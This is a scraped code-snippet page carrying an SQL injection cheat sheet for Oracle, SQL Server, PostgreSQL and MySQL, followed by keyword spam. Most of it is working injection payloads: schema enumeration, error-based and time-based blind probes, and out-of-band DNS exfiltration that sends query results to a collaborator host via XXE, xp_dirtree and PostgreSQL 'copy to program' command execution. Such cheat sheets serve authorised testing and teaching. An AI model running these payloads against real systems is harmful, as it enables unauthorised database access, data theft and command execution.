sql injection cheat sheet
Sql injection cheat sheet : is a powerful tool for web application penetration tests. It follows modular approach and it can be used for various tasks : post exploitation, database enumeration, data retrieval, etc.
String concatenation
on Jun 05, 2022
Oracle 'foo'||'bar'
Microsoft 'foo'+'bar'
PostgreSQL 'foo'||'bar'
MySQL 'foo' 'bar' [Note the space between the two strings]
CONCAT('foo','bar')
0
Substring
on Jun 05, 2022
Oracle SUBSTR('foobar', 4, 2)
Microsoft SUBSTRING('foobar', 4, 2)
PostgreSQL SUBSTRING('foobar', 4, 2)
MySQL SUBSTRING('foobar', 4, 2)
0
Comments
on Jun 05, 2022
Oracle --comment
Microsoft --comment
/*comment*/
PostgreSQL --comment
/*comment*/
MySQL #comment
-- comment [Note the space after the double dash]
/*comment*/
0
Database version
on Jun 05, 2022
Oracle SELECT banner FROM v$version
SELECT version FROM v$instance
Microsoft SELECT @@version
PostgreSQL SELECT version()
MySQL SELECT @@version
0
Database contents
on Jun 05, 2022
Oracle SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
Microsoft SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQL SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
0
Conditional errors
on Jun 05, 2022
Oracle SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
Microsoft SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQL SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQL SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')
0
Batched (or stacked) queries
on Jun 05, 2022
Oracle Does not support batched queries.
Microsoft QUERY-1-HERE; QUERY-2-HERE
PostgreSQL QUERY-1-HERE; QUERY-2-HERE
MySQL QUERY-1-HERE; QUERY-2-HERE
0
Time delays
on May 06, 2022
Oracle dbms_pipe.receive_message(('a'),10)
Microsoft WAITFOR DELAY '0:0:10'
PostgreSQL SELECT pg_sleep(10)
MySQL SELECT sleep(10)
0
DNS lookup
on Jun 05, 2022
Oracle The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
The following technique works on fully patched Oracle installations, but requires elevated privileges:
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')
Microsoft exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
PostgreSQL copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
MySQL The following techniques work on Windows only:
LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')
SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
0
DNS lookup with data exfiltration
on Jun 05, 2022
Oracle SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
Microsoft declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')
PostgreSQL create OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();
MySQL The following technique works on Windows only:
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
0
Hopefully above mentioned answers will setisfied your questions. If you have any queries, you can quete your answers or suggestions also.
SQL answers related to "sql injection cheat sheet"
how to prevent application from sql injection in codeigniter https://www.jitendrazaa.com/blog/sql/sqlserver/export-documents-saved-as-blob-binary-from-sql-server/ sql alter column name sql server on delete cascade meaning of on delete cascade like operator in sql sql syntax sql like % like operator in sql like operator in sql between operator like operator in sql between operator is not in sql server like syntax in sql is not in sql server is not sql is not sql is not sql what is where in sql what is where in sql is not in sql server like syntax in sql like syntax in sql like syntax in sql in sql in sql if in sql like and not like together in sql sql now
View All SQL queries
SQL queries related to "sql injection cheat sheet"
sql injection cheat sheet how to prevent application from sql injection in codeigniter sql alter column name sql server https://www.jitendrazaa.com/blog/sql/sqlserver/export-documents-saved-as-blob-binary-from-sql-server/ sql update query get database list in sql server sql concat string with column value sql server get users oracle sql drop index sql insert inserted id sql server cast date dd/mm/yyyy pl/sql procedure example sql declare variable sql convert datetime to year month delete table sql sql server update c# example code key validation sql pl sql trigger determine if insert or update or delete finding duplicate column values in table with sql add column table sql default value get column name sql server sql query with replace function declare table variable sql server rename table sql server sql server add unique constraint get current month last date in sql server sql server alter column base64 encode sql server sql count duplicate rows SQL Integer devision convert utc to est sql sql server drop table if exists truncate delete and drop in sql oracle sql create user sql date format yyyy-mm-dd sql server to_date sql server to date sql convert string to date yyyymmdd sql convert string to date yyyymmddhhmmss sql print all names that start with a given letter sql server beginning of month copy table sql server t-sql disable system versioning sql query to get the number of rows in a table sql server 2016 split string sql select except null create table if not exists sql sql server concat string and int could not find driver (SQL: select * from information_schema.tables where table_schema = pics and table_name = migrations and table_type = 'BASE TABLE') sql show tables how to use group_concat in sql server sql count mysql run sql file sql substring sql oracle update multiple rows how to create table in sql sql syntax create timestamp column sql insert from excel sql where contains how to sort names in alphabetical order in sql id increment ms sql server sql to char function with date SQL: merging multiple row data in string How to View column names of a table in SQL sql update from select sql drop column sql datetime now get duplicate records in sql with in sql server sql server restore database add multiple field in table sql SQL DELETE download sql server for mac sql timestamp to date import sql file from laravel create user defined table type in sql date datatype in sql DB: in eloquent using sql order of sql sql delete column case when switch in SQL get tables in database sql replace null with 0 in sql remove default constraint sql server ms sql now update a row in sql in sql orcale sql change column type sql multiple insert postgres illuminate database queryexception could not find driver (sql select * from insert in to table sql sql server pivot rows to columns how to connect to xampp sql server on windows cmd t-sql update from select sql join on a subquery sql like case sensitive sql select execute table valued function in sql sql get last ID oracle sql copy table without data max in sql sql server today minus n data types in sql sql in buscar nombre de columna en todas las tablas sql server sql if empty then sql as w3schools sql foreign key how to set foreign key in sql server sql primary key how to write uppercase in sql how to get initials in sql sql counter column import sql file mysql commadn line how to export table data from mysql table in sql format sql server time stamp procedures in pl sql microsoft sql server like operator in sql unique element in sql left joing sql what is delete in sql how to update data in sql year sql server function get week day from date in sql sql is not null alter column sql server sql how to partition rank sql select inner join example sql describe sql find second highest salary employee count function in sql add multiple columns to table sql aliases in sql if in sql how to copy one table to other one in sql return columns from table sql sql delete duplicate rows but keep one sql server select rows by distinct column alter in sql sql limit order by describe table in sql join types in sql view t-sql mail configuration sql check same row how to find average value in sql sql where contains part of string oracle SQL developer UPDATE command in SQL get first monday of month sql sql like How to Add a Default Value to a Column in MS SQL Server mode in sql sql how to get courses that i have made prerequisites apt install sql server store unicode characters in sql varchar() fields sql server version control do you know sql like syntax in sql sql script to get a type task on jira datbase for 12 months how to get specific salary in sql How do I install microsoft SQL on my Mac? local vs global variables in sql t sql dynamic top n query sql table intermédiaire an exception occurred while executing a transact-sql statement or batch user,group or role already is not in sql server load utilities in sql server SQL print multiple variable oracle sql for each row create new databse sql automatically update database last seen datetime in sql tcl in sql group function in sql SQL Hello, [firstname] [lastname] sql view index what is auto increment in sql sql server roles and users sql query to find percentage of null values in a table sql padd let with zeros how to create an SQL save method in ruby sql commands in android sql types how to list all values of a column that start with a letter in sql modificar tipo de dato sql server sql truncate table referencing itself what is in operator in sql sql use with to get value counts and percentages entity framework connection string sql server Join In Sql Server sql select rows with simlar names coursera spark sql max count if there is no schema in sql update sql sintassi fetcht he leftmost word in a comma separated string in sql alter column datatype and length in table sql metada in sql oracle sql compile package
Browse Other Code Languages
Abap ActionScript Assembly BASIC C C# C++ Clojure Cobol CSS Dart Delphi Elixir Erlang F# Fortran Go Groovy Haskell Html Java Javascript Julia Kotlin Lisp Lua Matlab Objective-C Pascal Perl PHP PostScript Prolog Python R Ruby Rust Scala Scheme Shell/Bash Smalltalk SQL Swift TypeScript VBA WebAssembly Whatever